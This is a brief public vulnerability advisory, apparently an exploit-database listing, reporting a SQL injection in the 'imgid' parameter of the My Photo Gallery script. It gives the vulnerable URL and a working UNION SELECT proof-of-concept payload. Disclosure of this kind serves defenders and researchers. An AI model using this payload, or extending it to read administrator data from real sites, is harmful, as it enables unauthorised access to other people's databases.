Introduction
 
Exploit Title: My Photo Gallery a SQL Injection
Date: 27.01.2017
Vendor Homepage: http://software.friendsinwar.com/
Software Link: http://software.friendsinwar.com/news.php?readmore=40
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
  
Overview
  
My Photo Gallery is a free is a user-friendly picture gallery script.
Users can register and upload their images to the site. A moderator can see the images and validate, edit or delete them.
The script comes with a very user friendly admin system where you can change and add many things such as: Categories, Images, Edit members, site looks and many more.
 
Type of vulnerability:
 
An SQL Injection vulnerability in My Photo Gallery allows attackers to read
arbitrary administrator data from the database.
 
Vulnerable Url:
 
http://locahost/my_photo_gallery/image.php?imgid=[payload]
Vulnerable parameter : imgid
Mehod : GET
 
Payload:
imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)--